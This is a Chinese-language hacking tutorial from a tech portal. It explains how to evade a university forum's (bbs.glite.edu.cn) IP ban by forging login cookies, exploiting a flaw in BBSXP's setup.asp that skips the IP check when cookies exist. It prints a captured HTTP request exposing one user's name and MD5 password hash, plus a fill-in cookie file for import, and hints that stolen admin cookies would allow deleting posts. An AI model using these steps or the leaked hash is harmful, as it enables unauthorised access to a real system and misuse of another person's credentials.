|
|
域名空间 下载中心 社区论坛 信息公告 my小屋 | |
 |
联系我们 设为首页 加入收藏 |
 |
|
 |
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿 论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图 专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版 社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 网络赚钱 | 网站地图 | 广告服务 | 服务 |
 |
 |
 |
 当前位置:首页>>网络安全>>黑客技术>>正文 |
新版上线![旧版] |  |
|||
注:打开慢时请稍等
|
ok让我们开始。 论坛过滤 ip是在setup.asp这个页, if request.cookies("username") <> empty then sql="select * from [user] where username='"&htmlencode(request.cookies("username"))&"'" set rs=conn.execute(sql) if rs.eof then response.cookies("username")="" if request.cookies("userpass") <> rs("userpass") then response.cookies("username")="" membercode=rs("membercode") userface=""&rs("userface")&"" newmessage=rs("newmessage") userlife=rs("userlife") set rs=nothing end if if request.servervariables("http_x_forwarded_for")=empty then remoteaddr=request.servervariables("remote_addr") else remoteaddr=request.servervariables("http_x_forwarded_for") end if if badip<>empty then filtrate=split(badip,"|") for i = 0 to ubound(filtrate) if instr("|"&remoteaddr&"","|"&filtrate(i)&"") > 0 then response.redirect "inc/badip.htm" next end if if request.cookies("skins")=empty then response.cookies("skins")=style 这段代码就是setup.asp里验证用户这块,先读下吧.如果cookies不为空,则读取数据库验证用户的密码是否正确,正确的话定义变量,把一些需要用到的变量全都用数据库里读出来的数据赋值。然后进行读ip.如果ip属于被封的,则导向badip.htm禁止发登陆。 我们学校的系统和这个代码有出入,他们是自己改的代码。把校外的ip 全封掉,不过都是在这个基础上改的。他们的验证是另外写了一段代码验证的。应该是在登陆页做的封ip段代码,猜想是先判断cookies是否是真的,如果存在的话就直接跳过验证ip那段。如果为空的话,则用户没有登陆,然后才进行ip验证。他们的思路应该是这样。(没办法,不是我自己的系统,只能猜他们的封ip思路)导致过滤不严密。 如果个人文件中有cookies,系统就认为用户已经登陆,而不再进行ip的验证。这个就是我们今天破解被锁ip登陆的关键之处。伪造cookies get /images/closedfold.gif http/1.1 accept: */* referer: [url]http://bbs.glite.edu.cn/showforum.asp?forumid=31[/url] accept-language: zh-cn accept-encoding: gzip, deflate if-modified-since: wed, 15 may 2002 07:17:34 gmt if-none-match: "07b5995e0fbc11:17b1" user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; maxthon) host: bbs.glite.edu.cn connection: keep-alive cookie: onlinetime=2005%2d5%2d28+14%3a43%3a04; addmin=60; aspsessionidacbsqcct=lkfhjhecmpoocdcphejiadhc; forumid=31; filename=%7c2005528131326%7c2005528134747; username=yuan8627; userpass=f1913eb31c9ca1f1341b1dc9de069d8c; eremite=0 抓包显示cookies内容,上线时间onlinetime 在线分钟数addmin,看这段 username=yuan8627; userpass=f1913eb31c9ca1f1341b1dc9de069d8c;。我们不得不又一次骂bbsxp这个论坛垃圾,用户名和密码都是数据库中的,虽然经过md5加密。dvbbs中cookies里的密码和数据库中的密码不一样,分开验证,所以伪造cookies几乎不可能。bbsxp 中代码的安全考虑不够,还号称国内最安全....如果有用户而已劫持了斑竹或者是管理员的cookies,然后进行cookies伪造,前台的权限可以删除帖子,修改帖子,版块。后果不堪设想。这个只留给有心的人了。 我们今天是要伪造个登陆过的cookies,然后突破ip封锁。 不能进行登陆,所以不能用iecv.exe来进行编辑.cookies 修改的同时会修改目录下的 index.dat这个文件{ie的索引文件,浏览的网页越多暗藏的“index.dat”索引文件容量也就越大。此选项可以初始化index.dat文件。}我发现ie下有个导入导出cookies功能,所以先把自己的cookies导出,然后再用把用户名和密码替换成另外一个号的,然后再进行导入。发现成功了,cookies导入的同时修改了目录下的index.dat 文件 所以,我们只需要自己把以前的cookies导出,然后在需要进入论坛的时候直接导入就可以自由的出入论坛了,再也没有ip的限制。 我在铁通的校外网上测试成功。 # internet explorer cookie file, exported for netscape browsers. bbs.glite.edu.cn true / false 1149109143 username 请用你的用户名覆盖 bbs.glite.edu.cn true / false 1149109143 userpass 请用你的经过加密的密码覆盖 bbs.glite.edu.cn true / false 1149109143 eremite 0 这个是导出的cookies文件内容,直接用自己的用户名和经过md5加密的密码覆盖,用ie导入就可以进入论坛了。 md5是32加密,加密工具上网搜一下一大把。 编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部] 上一篇:互联网安全:从花瓶到不可或缺 下一篇:隐私万岁-我的秘密你别猜(1) 转载请注明来源:www.iyit.net 特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
| 相关文章 | ||||
| 友情链接 | ||||||
 |
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接 |  |
| |||||||
易特网络技术